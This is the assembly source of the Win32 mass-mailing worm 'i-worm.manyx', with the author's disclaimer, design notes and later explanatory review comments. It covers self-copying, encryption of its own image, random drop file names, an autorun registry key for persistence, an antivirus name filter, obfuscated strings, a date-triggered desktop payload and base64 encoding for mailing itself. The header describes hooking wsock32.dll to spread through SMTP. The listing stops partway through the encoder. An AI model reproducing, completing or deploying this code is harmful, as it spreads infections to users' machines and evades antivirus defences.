
;
; i-worm.manyx
; Coded by Bumblebee
;
; DISCLAIMER -
;
; THIS IS THE SOURCE CODE OF A VIRUS/WORM.
;
; IN NO EVENT SHALL THE AUTHOR OF THIS PROGRAM BE LIABLE FOR ANY DIRECT,
; INDIRECT,  INCIDENTAL,  SPECIAL,  EXEMPLARY,  OR CONSEQUENTIAL DAMAGES
; ARISING   IN   ANY   WAY   OUT   OF   THE   USE   OF   THIS  SOFTWARE.
;
; USE  IT AT YOUR OWN RISK,  OR DON'T USE IT.  BUT DON'T  FUCK THE CODER!
;
; Some comments:
;
; Think about it as a main body able to install some of its parts (those
; parts are not a complete virus, only the needed stuff to let the  main
; body keep on spreading). When one of those  parts  is  installed,  the
; rest can be removed from the system and the piece still work.
; The way each part work is very determined by the main body. That seems
; so logical for an infected file (the polymorphic  code  usually  never
; changes once the file is  infected), but  is  also  applied  to  wsock
; infection. That is what i call 'slow behavior'.
; However there is a little random part, but is not very important after
; all.
;
; There follows a brief for each part:
;
;  main body: infect wsock32.dll, install, payload and infect PE files
;  wsock32.dll: hook smtp sessions to send a copy of the main body
;  infected file: drop and exec main body
;
; Notice that infected files will ALWAYS exec the main body, no matter
; whether it is installed yet. In that way the virus acts as a  direct
; action infector, even though infected samples themselves won't infect
; other files. That's due,
; once the main body is installed, it will infect all files in  current
; directory (work directory). That means when an  infected  notepad  is
; called by explorer for reading a txt file, it will try  to  drop  the
; main body and exec it. At this point the work directory of  the  main
; body will be notepad's one, so it will  infect  files  there  as  the
; classical direct action infector does.
;
; The only data fixed is the filename where the main body is  saved  in
; each drop. Some random data is based in the C HDD volume name and, in
; wsock case, in the stack of the app sending the  mail.  The  infected
; samples will come from random hotmail address. I know that's not fair
; but most smtp and esmtp servers today check the sender domain exists.
; I'm sure ISPs won't block all hotmail mails (sexyfun.net  is  blocked
; in several ones huehuehue).
;
; Why ios.sys? Simple: it exists in DOS 6.22 (i'm not sure  if  older).
; Because of this it is a name you're used to, and you won't delete it.
; Win9x has an io.sys file, but not ios.sys (at least until you're infected).
;
; Why the installation name is 8 random letter? Because Hybris and  may
; be other viruses use the same way. A confused user is  nice  when  he
; needs to find help.
;
; Why some strings are encrypted in main body and others not? mmm  I've
; encrypted only some that may show as suspicious. Anyway  it  is  only
; a protection before the file is installed,  and  no  matter  if  that
; ABFDGABC.exe has suspicious strings or not. If you got it, IT'S  VERY
; SUSPICIOUS. In the same way, if the user  peeps  into  wsock32.dll...
; The fact is tested av were not able to detect it in 1st place.
;
; Sometimes filenames found into personal folder (usually my documents)
; will be used to generate the mail to send. Sometimes not. The wsock32
; hook is intended to be full compatible and stable (in fact  it  works
; fine with both blocking and non-blocking sockets, no matter how  slow
; is the connection with the smtp server and what mta you use).
;
; I've coded it with win98 in mind, since it  is  the  most  widespread
; win32 compliant system. Indeed most parts will work  in  most  win32.
;
; It uses base64 and MIME 1.0, the payload is not destructive but clear
; enough (and annoying), and there are no comments in the source :)
;
; Have fun.
;
; - main.asm BOF -

%include "win32n.inc"

[extern ExitProcess]
[extern CreateFileMappingA]
[extern GetLastError]

[segment .text]
[global main]

;-----------------------------------------------------------------------
; main - process entry point (NASM, Win32 stdcall imports).
; Sequence: stealthProc -> initAux -> installMailHook -> install; then,
; only when install returns CF=1, a single-instance check through a named
; file mapping, the PE scan of the current directory and the payload.
; Conventions visible here: initAux and install report status in CF;
; the mapping handle is kept in ecx / on the stack across calls.
; stealthProc, installMailHook, install and scandirpe live in the
; included .inc files and are not visible in this listing.
;-----------------------------------------------------------------------
main:
        call    stealthProc             ; defined in an included file (not shown)

        call    initAux                 ; CF=1 -> setup failed; nothing to free, exit directly
        jc      exitApp

        call    installMailHook

        call    install
        jnc     exitDeinitApp           ; CF=0 -> stop here; CF=1 -> continue (meaning of CF set in install.inc, not shown)

        ; CreateFileMappingA(hFile=-1, lpAttributes=0, flProtect=4,
        ;   dwMaximumSizeHigh=0, dwMaximumSizeLow=1024, lpName=regName)
        ; Arguments are pushed right-to-left; eax is 0 for the two NULLs
        ; and becomes -1 (INVALID_HANDLE_VALUE, pagefile-backed mapping)
        ; via the DEC before the final push.
        xor     eax,eax
        push    dword regName           ; lpName: 5 zero bytes in .data, filled elsewhere (presumably install.inc) - TODO confirm
        push    dword 1024              ; dwMaximumSizeLow
        push    eax                     ; dwMaximumSizeHigh = 0
        push    dword 4                 ; flProtect = PAGE_READWRITE
        push    eax                     ; lpAttributes = NULL
        dec     eax                     ; eax = -1 = INVALID_HANDLE_VALUE
        push    eax                     ; hFile
        call    CreateFileMappingA
        or      eax,eax
        jz      exitDeinitApp           ; mapping could not be created

        ; The named mapping doubles as a single-instance lock: when it
        ; already existed GetLastError() == 0B7h (ERROR_ALREADY_EXISTS) and
        ; this instance backs off. The handle survives the call in ecx.
        push    eax
        call    GetLastError
        pop     ecx
        cmp     eax,0b7h                ; ERROR_ALREADY_EXISTS
        je      exitDeinitApp           ; another instance is running (handle left to ExitProcess)

        push    ecx                     ; keep the mapping handle for CloseHandle below

        not     dword [fmask]           ; decode complemented "*.ex" -> "*.exe" (one-way toggle: a second NOT re-obfuscates)
        call    scandirpe               ; per the header: infect PE files in the current directory (infectpe.inc/findfiles.inc)

        call    payload                 ; returns at once unless the date trigger matches; otherwise never returns

        call    CloseHandle             ; consumes the handle pushed above (unreachable when payload fires)

exitDeinitApp:
        call    deInitAux               ; free the two GlobalAlloc buffers from initAux

exitApp:
        push    dword 0
        call    ExitProcess             ; ExitProcess(0)

%include "auxf.inc"
%include "payload.inc"
%include "install.inc"
%include "infectpe.inc"
%include "poly.inc"
%include "findfiles.inc"
%include "process.inc"
%include "wsock.inc"

[segment .data]

; Initialised data. Several string fragments are stored as the bitwise
; complement of their 4-byte little-endian value (NASM `~'....'`) and are
; decoded in place at run time with `not dword [...]` (see genFileName and
; main). The decode is a toggle: applying it twice re-obfuscates.

seed            dd      87654321h       ; PRNG state for rnd; bumped in initAux from GetTickCount + local time
iname           db      '\'             ; "\" + fname + ".exe": the three items below are contiguous
fname           db      0,0,0,0,0,0,0,0 ; 8 letters written by genFileName (A..J)
                dd      ~'.exe'         ; complemented ".exe", decoded by genFileName
                db      0
regKey          db      "SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0   ; autorun key (used by install.inc, not shown)
regName         db      0,0,0,0,0       ; 5 bytes; used as the file-mapping name in main; filled elsewhere - TODO confirm where
hkey            dd      0               ; HKEY out-param of RegOpenKeyExA in getPersonal
drive           db      'c:\',0

encTable        db      'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuv'  ; standard base64 alphabet (encodeBase64)
                db      'wxyz0123456789+/'

fmask           dd      ~"*.ex"         ; complemented "*.ex" followed by "e",0 -> "*.exe" after the NOT in main
                db      'e',0
findHnd         dd      0               ; find handle (findfiles.inc, not shown)

perPath         db      "SOFTWARE\Microsoft\Windows\CurrentVersion"   ; HKCU key whose "Personal" value is the My Documents path
                db      "\Explorer\Shell Folders",0
perValue        db      "Personal",0
PersonalPs      dd      128             ; in/out byte count of PersonalP for RegQueryValueExA (overwritten by the call)
fmaskall        dd      ~"*.*"          ; complemented "*.*",0 (the NUL is inside the dword)

kernel32dll     db      'KERNEL32.DLL',0
registerSrvProc db      'RegisterServiceProcess',0   ; Win9x export; presumably resolved by name in process.inc (not shown)

wsock32dllp     db      '\'             ; "\" + "wsock32.dll": first 8 bytes complemented, decoded by two NOTs elsewhere
wsock32dll      dd      ~'wsoc',~'k32.'
                db      'dll',0

wininitstr      dd      ~'[ren',~'ame]' ; "[rename]" CR LF - wininit.ini section header, first 8 bytes complemented
                db      0dh,0ah
wininitstrLen   equ     $-wininitstr    ; 10 bytes
wininit         dd      ~'\win'         ; "\wininit.ini", first 4 bytes complemented
                db      'init.ini',0

dropCode:                               ; dropper stub image (dropit.inc); per the header it is what infected files carry
%include "dropit.inc"

wsockCode:                              ; wsock32.dll SMTP-hook image (wsockhook.inc)
%include "wsockhook.inc"

[segment .bss]

; Uninitialised data (zeroed at load).

memory          resd    1               ; GlobalAlloc'd buffer of 16*(vsize+5) bytes: the running module's image, XOR-encrypted in place by initAux
attachment      resd    1               ; = memory + vsize + 5: base64 copy of the (unencrypted) image, written by encodeBase64
vsize           resd    1               ; byte size of the running module's file
swidth          resd    1               ; SM_CXFULLSCREEN (payload)
sheight         resd    1               ; SM_CYFULLSCREEN (payload)
localtime       resd    4               ; SYSTEMTIME (16 bytes) filled by GetLocalTime
fHnd            resd    1
mapMem          resd    1
fhmap           resd    1
fileTime0       resd    2               ; three FILETIMEs; presumably the timestamps of a file being infected (infectpe.inc) - TODO confirm
fileTime1       resd    2
fileTime2       resd    2
fileAttrib      resd    1
fileSize        resd    1
padding         resd    1
ccKey           resd    1               ; only the low byte is used: starting XOR key for the image (initAux)

; Polymorphic-engine / PE-infector state (poly.inc, infectpe.inc; not shown)
poly            resd    1               ; GlobalAlloc'd work buffer of MAXPOLY*MAXLAYER + dropperSize+5 + vsize bytes
polySize        resd    1
crptBegin       resd    1
registers       resd    8
freer           resd    1
rIdx            resd    1
rCnt            resd    1
vKey            resd    1
mKey            resd    1
vIdx            resd    1
vCnt            resd    1
lCnt            resd    1
kStack          resd    MAXLAYER 
mStack          resd    MAXLAYER 
; WIN32_FIND_DATAA laid out field by field (names mirror the SDK struct).
; cAlternateFilename is 16 bytes here versus the SDK's 14; that only
; over-allocates.
finddata:
        dwFileAttributes resd  1
        dwLowDateTime0  resd   1
        dwHigDateTime0  resd   1
        dwLowDateTime1  resd   1
        dwHigDateTime1  resd   1
        dwLowDateTime2  resd   1
        dwHigDateTime2  resd   1
        nFileSizeHigh   resd   1
        nFileSizeLow    resd   1
        dwReserved      resd   2
        cFileName       resb   260
        cAlternateFilename resb 16

PersonalP       resb 128                ; "Personal" folder path read by getPersonal; PersonalPs holds its byte count

; - main.asm EOF -
; - payload.inc BOF -

[extern GetDesktopWindow]
[extern LoadIconA]
[extern GetWindowDC]
[extern DrawIcon]
[extern GetSystemMetrics]
[extern GetLocalTime]

;-----------------------------------------------------------------------
; payload - date-triggered visual payload.
; Trigger (all three must hold, read from the SYSTEMTIME in localtime):
;   wMonth (+2) even, wDay (+6) == 5, wHour (+8) has bit 3 set (08..15h).
; When it fires it never returns: it draws the IDI_WINLOGO icon at random
; positions on the desktop window DC in an endless loop (the DC and icon
; are never released). Otherwise it returns immediately via doRet.
; Clobb: eax, ecx, edx, esi, edi, flags.
; Trick: `doRet equ $-1` aliases the 0C3h immediate of `mov al,0c3h`;
; 0C3h is the RET opcode, so a jump to doRet executes RET while the
; fall-through path executes a harmless MOV AL.
;-----------------------------------------------------------------------
payload:
        push    dword localtime
        call    GetLocalTime            ; GetLocalTime(&localtime)
        lea     esi,[localtime]
        test    word [esi+2],1          ; wMonth odd -> no payload
        jnz     doRet
        cmp     word [esi+6],5          ; wDay != 5 -> no payload
        jne     doRet
        test    word [esi+8],8          ; wHour bit 3 clear -> no payload
        jz      doRet
        mov     al,0c3h                 ; immediate byte doubles as RET for the doRet jumps
doRet   equ     $-1

        push    dword SM_CXFULLSCREEN
        call    GetSystemMetrics
        mov     [swidth],eax            ; width bound for the random X

        push    dword SM_CYFULLSCREEN
        call    GetSystemMetrics
        mov     [sheight],eax           ; height bound for the random Y

        push    dword 32517 ; IDI_WINLOGO
        push    dword 0                 ; hInstance = NULL -> system icon
        call    LoadIconA

        push    eax                     ; hIcon, recovered into esi below

        call    GetDesktopWindow

        push    eax
        call    GetWindowDC             ; GetWindowDC(desktop)

        pop     esi                     ; esi = hIcon
        mov     edi,eax                 ; edi = desktop DC

iconLoop:
        ; DrawIcon(hDC=edi, X=rnd(swidth), Y=rnd(sheight), hIcon=esi);
        ; rnd pops its own argument (retn 4), so the stack stays balanced.
        push    esi
        push    dword [sheight]
        call    rnd
        push    eax                     ; Y
        push    dword [swidth]
        call    rnd
        push    eax                     ; X
        push    edi
        call    DrawIcon
        jmp     iconLoop                ; endless; the process only ends when killed

; - payload.inc EOF -

; - auxf.inc BOF -

[extern GetTickCount]
[extern GetModuleFileNameA]
[extern GlobalAlloc]
[extern GlobalFree]
[extern CreateFileA]
[extern GetFileSize]
[extern ReadFile]
[extern CloseHandle]

;-----------------------------------------------------------------------
; initAux - one-time setup.
; Reads the running module's own file into a heap buffer, base64-encodes
; it into `attachment` (the mailed copy), XOR-encrypts the raw copy in
; place (the copy the dropper carries), picks the drop file name,
; allocates the poly work buffer and resolves the "Personal" folder.
; Out:    CF=0 on success; CF=1 on failure (every failure jump lands on
;         the 0F9h byte aliased by initAuxKO, which is the STC opcode).
; Writes: seed, vsize, dropSize, memory, attachment, attachmentSize,
;         ccKey, cKey, fname, poly and, through getPersonal, pflag/PersonalP.
;         dropSize, cKey, attachmentSize, MAXPOLY, MAXLAYER and dropperSize
;         are defined in included files not shown here.
; Clobb:  eax, ecx, edx, esi, edi, flags (ebp saved and restored).
; Stack:  one 260-byte local (the module path; later reused as the
;         lpNumberOfBytesRead out-param of ReadFile).
; NOTE(review): on the first GlobalAlloc failure the dword pushed just
; before it (vsize+5) is still on the stack when `pop ebp` at initAuxKO
; runs, so ebp gets that value and `leave` then loads a garbage esp; the
; file handle in esi is also never closed on that path. The ReadFile
; return value and byte count are not checked either.
;-----------------------------------------------------------------------
initAux:
        push    ebp
        mov     ebp,esp
        sub     esp,260                 ; 260-byte local buffer below the frame
        push    ebp                     ; save the frame pointer; restored by `pop ebp` before `leave`
        sub     ebp,260                 ; ebp -> start of the local buffer

        push    dword localtime
        call    GetLocalTime

        call    GetTickCount
        add     eax,dword [localtime+8] ; wHour|wMinute<<16 read as one dword
        add     [seed],eax              ; perturb the PRNG state (low-entropy seed: tick count + clock)

        ; GetModuleFileNameA(NULL, buf, 260) -> path of this executable
        push    dword 260
        push    ebp
        push    dword 0
        call    GetModuleFileNameA
        or      eax,eax
        jz      near initAuxKO          ; 0 chars -> fail

        ; CreateFileA(buf, GENERIC_READ, FILE_SHARE_READ, NULL,
        ;             OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL)
        push    dword 0
        push    dword 80h               ; FILE_ATTRIBUTE_NORMAL
        push    dword 3                 ; OPEN_EXISTING
        push    dword 0
        push    dword 1                 ; FILE_SHARE_READ
        push    dword 80000000h         ; GENERIC_READ
        push    ebp
        call    CreateFileA
        inc     eax                     ; INVALID_HANDLE_VALUE (-1) test that leaves eax intact
        jz      near initAuxKO
        dec     eax

        push    eax
        push    dword 0
        push    eax
        call    GetFileSize             ; GetFileSize(h, NULL)
        pop     esi                     ; esi = file handle
        mov     edi,eax                 ; edi = file size

        mov     dword [vsize],eax
        mov     dword [dropSize],eax

        ; GlobalAlloc(GMEM_FIXED, 16*(size+5)); size+5 is kept on the
        ; stack as the offset of the base64 area inside the block.
        add     eax,5
        push    eax
        add     eax,eax
        add     eax,eax
        add     eax,eax
        add     eax,eax                 ; eax = 16*(size+5)
        push    eax
        push    dword GMEM_FIXED
        call    GlobalAlloc
        or      eax,eax
        jz      near initAuxKO          ; NOTE(review): leaves size+5 on the stack and esi open (see header)

        mov     [memory],eax
        pop     ecx
        add     ecx,eax
        mov     [attachment],ecx        ; attachment = memory + size + 5

        ; ReadFile(h, memory, size, &bytesRead -> reuses the path buffer, NULL)
        push    dword 0h
        push    ebp
        push    edi
        push    eax
        push    esi
        call    ReadFile                ; result unchecked

        push    esi
        call    CloseHandle

        ; ecx = 3 * ceil(vsize/3): input length for the base64 pass, so
        ; the encoder may read up to 2 bytes past vsize (covered by the +5).
        mov     eax,[vsize]
        xor     edx,edx
        mov     ecx,3
        div     ecx
        or      edx,edx
        jz      incredible              ; already a multiple of 3
        inc     eax
incredible:
        mul     ecx
        mov     ecx,eax
        mov     eax,[memory]            ; source
        mov     edx,[attachment]        ; destination
        call    encodeBase64
        mov     [attachmentSize],ecx    ; encodeBase64 is expected to leave the output length in ecx

        ; Pick a non-zero one-byte key for the in-place encryption below.
otherKeyPlz:
        push    dword 0ffh
        call    rnd                     ; 0..254
        or      al,al
        jz      otherKeyPlz
        mov     [ccKey],al
        mov     [cKey],al

        ; Encrypt the raw image in place: b = ~b ^ key; key++ per byte.
        ; Only al feeds the XOR, so the key cycles modulo 256 (the carry
        ; from `inc ax` into ah is never used). The base64 copy made above
        ; is of the plain image.
        mov     esi,[memory]
        xor     eax,eax
        mov     al,[ccKey]
        mov     ecx,[dropSize]
encryptItLoop:
        not     byte [esi]
        xor     byte [esi],al
        inc     ax
        inc     esi
        loop    encryptItLoop

        call    genFileName             ; fills fname, decodes its ".exe"

        ; GlobalAlloc(GMEM_FIXED, MAXPOLY*MAXLAYER + dropperSize+5 + vsize)
        mov     eax,(MAXPOLY*MAXLAYER)
        add     eax,dropperSize+5
        add     eax,[vsize]
        push    eax
        push    dword GMEM_FIXED
        call    GlobalAlloc
        or      eax,eax
        jz      initAuxKO               ; memory from the first allocation is not freed on this path

        mov     [poly],eax

        call    getPersonal             ; sets pflag / PersonalP

        clc                             ; success: CF=0, then the MOV below is a no-op for the caller
        mov     al,0f9h                 ; 0F9h = STC; initAuxKO points at that byte so failures return CF=1
initAuxKO       equ $-1
        pop     ebp                     ; restore the frame pointer saved in the prologue
        leave
        ret

;-----------------------------------------------------------------------
; deInitAux - release the two GlobalAlloc'd buffers from initAux.
; Frees poly then memory; GlobalFree return values are ignored.
; Only reached from main after initAux succeeded, so both pointers are
; valid here; calling it after a failed initAux would pass 0 or a stale
; pointer to GlobalFree.
; Clobb: eax, ecx, edx, flags (stdcall callees).
;-----------------------------------------------------------------------
deInitAux:
        push    dword [poly]
        call    GlobalFree

        push    dword [memory]
        call    GlobalFree
        ret

;-----------------------------------------------------------------------
; genFileName - generate the 8-letter drop file name into fname.
; Each letter is rnd(10)+'A', i.e. only 'A'..'J' (10 symbols per
; position, not the full alphabet the header comment describes).
; Also decodes the complemented ".exe" dword stored at fname+8 with one
; NOT - a toggle, so a second call would re-obfuscate the extension.
; Clobb: eax, ecx, edx, edi, flags (ecx is preserved around rnd, which
; clobbers it).
;-----------------------------------------------------------------------
genFileName:
        lea     edi,[fname]
        mov     ecx,8
        not     dword [edi+ecx]         ; ~'.exe' at fname+8 -> ".exe"
fileName:
        push    ecx                     ; rnd clobbers ecx/edx
        push    dword 10
        call    rnd                     ; 0..9
        pop     ecx
        add     eax,'A'                 ; 'A'..'J'
        stosb
        loop    fileName
        ret

;-----------------------------------------------------------------------
; rnd - pseudo-random integer in [0, n).
; In:    [esp+4] = n (stack argument, removed by `retn 4`); n must be
;        non-zero or DIV raises #DE.
; Out:   eax = ((seed * 9E3779B9h) >> 16) mod n, and
;        seed += (seed * 9E3779B9h) >> 16.
; Clobb: ecx, edx, flags.
; 32-bit state seeded from the initial constant plus tick count / clock
; (initAux): not a cryptographic generator, so the names and keys derived
; from it are guessable given the seed inputs.
;-----------------------------------------------------------------------
rnd:
        mov     eax,[seed]
        imul    eax,9E3779B9h           ; multiply by the golden-ratio constant
        shr     eax,16                  ; keep the upper half (< 65536)
        add     [seed],eax              ; advance the state
        xor     edx,edx                 ; edx:eax / ecx needs edx cleared
        mov     ecx,[esp+4]
        div     ecx
        mov     eax,edx                 ; remainder
        retn    4                       ; callee pops the argument

;-----------------------------------------------------------------------
; getPersonal - read HKCU\...\Explorer\Shell Folders\Personal (the
; "My Documents" path) into PersonalP.
; Out:   pflag = 1 with PersonalP/PersonalPs filled on success;
;        pflag = 0 on any registry failure (PersonalP then untouched).
;        pflag is defined in an included file not shown here.
; Clobb: eax, ecx, edx, flags; hkey.
; RegOpenKeyExA is called with samDesired = 0 (no access rights
; requested); that is fine on Win9x, the stated target.
; NOTE(review): on NT-family systems a zero access mask may be rejected -
; TODO confirm if this is ever run there.
; NOTE(review): when RegQueryValueExA fails the opened key is leaked
; (personalKO skips RegCloseKey). lpType is NULL, so neither the value
; type nor NUL termination of the 128-byte buffer is verified before the
; path is presumably used for the "my documents" file names (see header).
;-----------------------------------------------------------------------
getPersonal:
        ; RegOpenKeyExA(HKEY_CURRENT_USER, perPath, 0, samDesired=0, &hkey)
        push    dword hkey
        push    dword 0
        push    dword 0
        push    dword perPath
        push    dword HKEY_CURRENT_USER
        call    RegOpenKeyExA
        or      eax,eax
        jnz     personalKO              ; non-zero = error code

        ; RegQueryValueExA(hkey, "Personal", NULL, NULL, PersonalP, &PersonalPs)
        ; eax is 0 (ERROR_SUCCESS) here and is reused for the two NULLs.
        push    dword PersonalPs
        push    dword PersonalP
        push    eax
        push    eax
        push    dword perValue
        push    dword [hkey]
        call    RegQueryValueExA
        or      eax,eax
        jnz     personalKO              ; key handle not closed on this path

        push    dword [hkey]
        call    RegCloseKey

        mov     byte [pflag],1
outtaPersonal:
        ret
personalKO:
        mov     byte [pflag],0
        jmp     outtaPersonal

;-----------------------------------------------------------------------
; isAV - heuristic name filter.
; In:    edi -> NUL-terminated ASCII string. It is MUTATED in place:
;        'a'..'z' are converted to upper case first.
; Out:   CF=1 if the string contains any of the two-character sequences
;        "AV","DR","SP","F-","AN","VE","CL","ON" (case-insensitive via the
;        upper-casing); CF=0 otherwise.
; Clobb: eax, edi (left at the match or at the end of the string), flags.
; Presumably used to skip files whose names look antivirus-related; the
; bigrams are broad ("AN", "ON") so many unrelated names are skipped too.
; Obfuscation: the constants are assembled complemented (~'AV') and the
; scanned word is complemented before comparison, so the plain bigrams do
; not appear in the binary.
; Trick: `itIsAV equ $-1` aliases the 0F9h immediate of `mov al,0f9h`,
; which is the STC opcode: jumps to itIsAV execute STC; RET, while the
; fall-through path runs CLC then a harmless MOV AL.
; NOTE(review): the first upper-case iteration examines [edi] before any
; NUL check (the check is on the byte after the INC), so an empty string
; makes the loop scan past its terminator.
;-----------------------------------------------------------------------
isAV:
        push    edi                     ; keep the string start for the scan
UCaseLoop:
        cmp     byte [edi],'a'
        jb      notUCase
        cmp     byte [edi],'z'
        ja      notUCase
        sub     byte [edi],'a'-'A'      ; ASCII to upper case, in place
notUCase:
        inc     edi
        mov     al,[edi]
        or      al,al                   ; stop at NUL (tested only after advancing)
        jnz     UCaseLoop
        pop     edi
avStrLoop:
        mov     ax,word [edi]           ; al = this char, ah = next char (or NUL)
        not     ax                      ; match the complemented constants
        cmp     ax,~'AV'
        je      itIsAV
        cmp     ax,~'DR'
        je      itIsAV
        cmp     ax,~'SP'
        je      itIsAV
        cmp     ax,~'F-'
        je      itIsAV
        cmp     ax,~'AN'
        je      itIsAV
        cmp     ax,~'VE'
        je      itIsAV
        cmp     ax,~'CL'
        je      itIsAV
        cmp     ax,~'ON'
        je      itIsAV
        not     ax                      ; restore so ah is the real next byte
        inc     edi                     ; slide the 2-byte window by one
        or      ah,ah                   ; next byte was the terminator -> done
        jnz     avStrLoop

        clc                             ; no match: CF=0
        mov     al,0f9h                 ; 0F9h = STC, reached directly via itIsAV on a match
itIsAV  equ $-1
        ret

encodeBase64:
        xor     esi,esi
        lea     edi,[encTable]
        push    ebp
        xor     ebp,ebp
baseLoop:

        xor     ebx,ebx
        mov     bl,byte [eax]
        shr     bl,2
        and     bl,00111111b
        mov     bh,byte [edi+ebx]
        mov     byte [edx+esi],bh
        inc     esi

        mov     bx,word [eax]
        xchg    bl,bh
        shr     bx,4
        mov     bh,0
        and     bl,00111111b
        mov     bh,byte [edi+ebx]
        mov     byte [edx+esi],bh
        inc     esi

        inc     eax
        mov     bx,word [eax]
        xchg    bl,bh
        shr     bx,6
        mov     bh,0
        and     bl,00111111b
        mov     bh,byte [edi+ebx]
        mov     byte [edx+esi],bh
        inc     esi

        inc     eax
        xor     ebx,ebx
        mov     bl,byte [eax]
        and     bl,00111111b
